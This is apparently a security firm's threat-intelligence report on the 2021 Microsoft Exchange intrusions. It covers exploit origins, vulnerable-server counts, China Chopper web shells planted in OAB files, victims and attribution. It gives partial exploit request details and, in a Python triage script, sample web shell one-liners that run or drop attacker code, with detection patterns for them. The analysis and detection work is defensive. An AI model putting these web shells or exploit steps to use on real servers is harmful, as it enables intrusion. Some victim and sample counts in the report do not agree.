Posted on Mar 15, 2021
Microsoft recently revealed that its Microsoft Exchange email service was the target of a successful cyberattack. The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify potential victims.
Although initially thought to have affected as many as 30,000 to 100,000 organizations, our analysis indicates that the number is far lower. Using our proprietary technology to scan the internet for vulnerable, public-facing Microsoft Exchange servers, we found between 2,500 and 18,000 vulnerable public-facing servers worldwide, the majority of them in Europe, the Middle East, and Africa (EMEA). However, the vast majority of the victims were located in the United States and Germany, demonstrating a strong degree of intentionality on the part of the perpetrators.
While our investigation is still ongoing, to date we have identified 302 unique organizations that were impacted across 10 different industry sectors. Nevertheless, despite the announcement of this intrusion, as of March 15, 2021, failure to install the necessary patch has left over 2,500 servers still vulnerable.
Other published assessments of the attack, based on open source information, have concluded that the primary adversary is Hafnium, a Chinese advanced persistent threat (APT) group. Our analysis confirms that the initial proof of concept exploit code was written by Chinese speakers; however, we are unable to confirm at this time whether the perpetrators are positively associated with Hafnium.
A cyber threat group, identified by Microsoft as Hafnium, conducted a major cyber offensive operation between early January and March 6, 2021. This operation targeted Microsoft® Exchange servers using several 0-day, or previously unknown, vulnerabilities that enabled the attackers to execute remote code to manipulate the victim’s systems.
The SecurityScorecard Investigations & Analysis team analyzed the incident to understand the scope and impact of the attack, learn more about the threat actors, and identify any potential victims.
The vulnerabilities identified in this attack include CVE-2021-26857, CVE-2021-27065, and CVE-2021-26855. These vulnerabilities form an exploitation chain that, when executed successfully in succession, allows the attacker to achieve remote code execution on the victim’s Microsoft Exchange server, enabling additional intrusions inside the network.
In this case, we found evidence that China Chopper was being dropped on exploited systems via these vulnerabilities. We dug a little deeper to see if we could uncover the origins of these vulnerabilities. We were able to find evidence that proof of concept code had been developed to utilize these exploits.
During our investigation, we looked for the existence of exploit code using these CVEs in the wild. We found discussions in social media and forum chatter about using CVE-2021-26855 to dump the contents of email.
Fig 1. Twitter posting (note screenshots have Chinese characters in them).
This led to identifying individual GitHub accounts posting just this sort of code. The author associated with one account developed the original exploit code for CVE-2021-26855 written in GoLang. The other author created tools to dump the contents of email from Exchange servers. We were able to connect these accounts to two Chinese-speaking authors.
Fig 1.2 GitHub account belonging to the author of the email dumping proof of concept
Proof of concept code that utilized these specific vulnerabilities has been discussed in places such as CVEBase. The exploit code repository was taken down; however, other GitHub accounts reference GreyOrder as the original author. We were able to find the original post by GreyOrder, even though it was deleted, through a cached reference to the post.
Fig 1.3 CVEBase
Fig 1.4 POC discussion on GitHub
The following is what was found posted from GreyOrder on March 3, 2021, only to be later removed from repositories.
Fig 1.5 Original GitHub posting for GreyOrder POC exploit
GreyOrder discloses some of the conditions required to trigger the vulnerability and how this tool, written in GoLang, can be used to download the contents of email from the affected Microsoft Exchange server. A few conditions have to exist in order to trigger the vulnerability.
The general behavior of this proof of concept exploit code is outlined below.
https:///owa/auth/x.js with headers
https:///ews/exchange.asmx. They send XML SOAP requests to https:///ecp/temp.js with the following headers:
Cookie: X-BEResource=%s/EWS/Exchange.asmx?a=~1942062522; Content-Type: text/xml
Fig 1.6 Proof of Concept Exploit Demonstration
We discovered the GreyOrder GitHub account has existed since 2018 with little associated activity. We can assess with moderate confidence that GreyOrder developed the first proof of concept exploit code prior to the disclosure.
Fig 1.7 GreyOrder GitHub
The impact of this attack was initially reported as affecting 30,000 to 100,000 organizations running Microsoft Exchange. Our analysis assessed how many on-premise Exchange servers are actually exposed, given that Microsoft asserted in its advisory on March 2, 2021, that Exchange Online (O365) was not vulnerable. Some key points and questions we identified in our analysis follow.
The primary adversary for this attack according to open source information is Hafnium. According to Microsoft reporting, Hafnium is a sophisticated Chinese APT group operating against various industry sectors. While our discovery of Chinese-speaking authors of the initial proof of concept exploit code only further solidifies Microsoft’s reporting on Hafnium, we are unable to confirm at this time if those authors are positively associated with Hafnium.
Using our proprietary technology to scan the Internet for public-facing Exchange servers vulnerable to CVE-2021-26855 reveals that the majority are in Europe, the Middle East, and Africa (EMEA). We focused on public-facing Exchange servers that we could confirm as still vulnerable or unpatched. Through our research and analysis, we found fewer than 18,000 vulnerable public-facing servers worldwide.
We can’t definitively say what drove the initial reports of significantly more organizations being hacked. They may be based on internal Microsoft telemetry of Exchange servers sold, or they may include servers behind a firewall that we would not be able to observe. Our figure represents the number of Exchange servers that we observed from the Internet, which is fewer than 18,000. Without additional information about the data on which those reports were based, we can only speculate about the discrepancy. As our research continues, we will update our reporting with any evidence we observe regarding these larger numbers of vulnerable servers.
Fig 1.8 Still Vulnerable Microsoft Exchange Servers CVE-2021-26855 (includes scans for outlook web access and on-premise)
Fig 1.9 Microsoft Exchange Servers exposed on the Internet (includes Outlook Web Access and on-premise)
During our investigation, we focused on some of the technical aspects of the attacks, such as the malware involved. We detected several malware files, known as web shells, related to this attack that were tagged as exploiting CVE-2021-26855 and CVE-2021-27065; that is, the web shells were specifically designed to be used with these vulnerabilities.
The adversary used the China Chopper web shell in this targeted attack.
The China Chopper web shell has two components: server-side and client-side. The client-side component is an executable with a graphical user interface for interacting with the server-side component. Unlike other web shells, which present an HTML interface on the compromised server that the attacker can use by visiting the page, a China Chopper web shell shows no content when visited. Therefore, the attacker needs the client-side component in order to interact with it. The client-side component provides the following capabilities on the affected server:
The server-side component is very short and simple, which makes it harder to detect. During the attacks related to the Microsoft Exchange vulnerabilities, we observed two types of China Chopper web shell.
The first type is injected into the ExternalUrl field of the OAB (Offline Address Book) files. It checks whether any files were uploaded with the request and, if so, saves them locally as an independent ASPX file.
The following example has a hardcoded ASPX file name:
We only observed the hardcoded value of “error.aspx”. However, we also observed a use case in which the file name and file content are sent as two different HTTP parameters and the web shell saves the given content in the specified file name:
The second example seems to be an evolution of the attack, probably in an attempt to make sure the file name is not exposed in the OAB file, to allow the attacker to upload more than one file, or to allow the attacker to randomly generate the file name.
The second type is also injected into the ExternalUrl field of the OAB files, but the injected content is different: it reads the value of an HTTP parameter and executes it on the server. An example of such a web shell is:
Since the attacker chooses the value of <aspx_file_name> in the first case and <parameter_name> in the second case, these different approaches may indicate the presence of two different attackers.
As of the date of publication, we detected 366 variants of the web shell that contained details of the victims’ Microsoft Exchange environment. Out of the 366 web shell samples, 337 were using HTTP parameters and 28 were using individual ASPX files.
Since the web shell was injected into the OAB files, which are configuration files containing information about the servers they run on, we were able to obtain the list of domains for the infected servers. Some of them are local domains while others are public.
The following is a list of distinct HTTP parameter values we observed along with the number of unique servers the attackers managed to infect:
Fig 2. Distribution of China Chopper web shell parameters
Apart from these, we observed two clusters of similar-looking parameter names, which suggests that two attackers are generating a unique parameter name for each infected server; each of these parameter names was used only once. The first cluster has parameter values such as rxDg52fHL9GW, WHotfJjxFadX, and EiH4yV2WGYgc, while the second has values such as 26c7d6bd63f345f9fea2797a57c1ac33, 2380d9e018988768600d9f3195b0095d, and ce62a4a53e118ff82150522c663ddae6.
A full example of an infected OAB file from an infected Microsoft Exchange server follows:
Full OAB file
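As an added defender-side example (not code from the original report), the triage below takes ExternalUrl values as an analyst might export them from the OAB virtual directory configuration (for example with the Exchange Management Shell cmdlet Get-OabVirtualDirectory), flags any value that carries server-side script, separates the two web shell types described above (file drop with a hardcoded ASPX name versus execution of an HTTP parameter), and sorts parameter names into the two naming clusters observed. The sample values are constructed to mirror the report's description and are not real victim data.

```python
import re
from typing import List, Optional

# Constructed sample ExternalUrl values (not real victim data). A legitimate
# value is a plain URL; the other three imitate the web shell types described.
SAMPLE_EXTERNAL_URLS = [
    "https://mail.example.test/OAB",
    'http://f/<script runat="server">Request.Files[0].SaveAs(Server.MapPath("error.aspx"));</script>',
    'http://f/<script runat="server">eval(Request["rxDg52fHL9GW"]);</script>',
    'http://f/<script runat="server">eval(Request["26c7d6bd63f345f9fea2797a57c1ac33"]);</script>',
]

SERVER_SCRIPT = re.compile(r'<script[^>]*runat\s*=\s*"server"', re.IGNORECASE)
PARAM_REF = re.compile(r'Request\s*\[\s*"([^"]+)"\s*\]')
ASPX_NAME = re.compile(r'([\w.-]+\.aspx)', re.IGNORECASE)


def classify_external_url(value: str) -> str:
    """No server-side script belongs in an OAB ExternalUrl; any is a web shell."""
    if not SERVER_SCRIPT.search(value):
        return "clean"
    if "Request.Files" in value:
        return "file-drop"      # type 1: writes an uploaded file to disk
    if PARAM_REF.search(value):
        return "param-exec"     # type 2: executes the value of an HTTP parameter
    return "unknown-shell"      # server-side script of a shape not covered above


def extract_parameter_name(value: str) -> Optional[str]:
    m = PARAM_REF.search(value)
    return m.group(1) if m else None


def cluster_parameter_name(name: str) -> str:
    """Heuristic grouping by the two per-server naming patterns observed."""
    if re.fullmatch(r"[0-9a-f]{32}", name):
        return "hex32"          # e.g. 26c7d6bd63f345f9fea2797a57c1ac33
    if re.fullmatch(r"[A-Za-z0-9]{12}", name) and name != name.lower():
        return "alnum12"        # e.g. rxDg52fHL9GW (mixed case, 12 chars)
    return "other"


def triage(values: List[str]) -> List[dict]:
    """Return one finding per suspicious ExternalUrl value, in input order."""
    findings = []
    for v in values:
        kind = classify_external_url(v)
        if kind == "clean":
            continue
        param = extract_parameter_name(v)
        dropped = ASPX_NAME.search(v) if kind == "file-drop" else None
        findings.append({"type": kind, "param": param,
                         "cluster": cluster_parameter_name(param) if param else None,
                         "dropped_file": dropped.group(1) if dropped else None})
    return findings
```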
One objective of the analysis was to understand the victimology of this attack and determine whether it aligns with a typical nation-state cyber offensive operation. We started by analyzing the discovered web shells and their capabilities, then focused on identifying victims. Most of the web shells were modified versions of the China Chopper web shell repurposed for this attack. The OAB files containing the web shells were initially created in 2013, 2014, 2016, and 2017, with a last modification date of March 5, 2021. The last modification date might suggest the time at which the web shell was added to the OAB files.
Additional research into the web shells dropped on compromised assets post-exploitation revealed some victim identities. From our research, we discovered 366 web shells (302 of which were unique) that contained detailed information about victim Exchange environments. We were able to identify at least 173 unique organizations that had been compromised as a result of this vulnerability in their public-facing Exchange servers. The overwhelming majority of victims are in the United States and Germany. This shows the intentionality of the attacker, especially considering that the vulnerable servers were predominantly in EMEA.
Fig 2.1 Distribution of web shell Victims
While a full analysis of identified victims is still ongoing, we have been able to identify a partial list of sectors of victimized organizations found to have been targeted by the China Chopper web shell. We plan on updating this research in the future.
Fig 2.2 Sector Victimology
We found cases in which the domains for the URLs specified in the OAB files are local, and we wonder whether this means there are infected Microsoft Exchange servers that are not publicly exposed to the Internet.
In addition to China Chopper, we discovered other web shell code designed to check whether products from FireEye®, CrowdStrike®, and CarbonBlack® are present. The code writes a response back depending on which condition is true [see below: “if..fireeye...write 1”, “if..confer (CarbonBlack)...write 2”, “if...crowdstrike...write 3”]. We believe the attacker is likely collecting this information in an effort to understand victim environment details. Such a web shell would allow additional malware to be deployed to terminate the security software.
The presence of this functionality demonstrates not only intentionality but sophistication that would elevate this attack beyond what a cyber crime group would be interested in conducting.
The analysis of competing hypotheses, also known as ACH, is an intelligence analytical model intended to rank evidence against plausible scenarios. Each hypothesis is ranked against the different pieces of evidence that either support or do not support it. We evaluated the following hypotheses, each against evidence that supports it and evidence that disproves it:
Hypothesis 1: 30,000 to 100,000 Microsoft Exchange servers are compromised
Hypothesis 2: GreyOrder is a member of Hafnium
Hypothesis 3: Techniques, Tactics & Procedures support a Nation State cyber offensive operation
While our research into this intrusion is continuing, we believe that our initial findings support, but do not confirm, Microsoft’s attribution to a Chinese APT group known as Hafnium. From our research we believe the authors of related proof of concept code were Chinese-speaking; the attackers targeted organizations primarily in the United States and Germany; the initial group of sectors is similar to those sectors previously targeted by Hafnium; and the attacker demonstrated sophistication in maintaining persistence within the victim’s network. While the vulnerability may currently be exploited by ransomware criminals, we believe the original attack was the work of a nation-state actor. Our research is ongoing and will be updated as appropriate.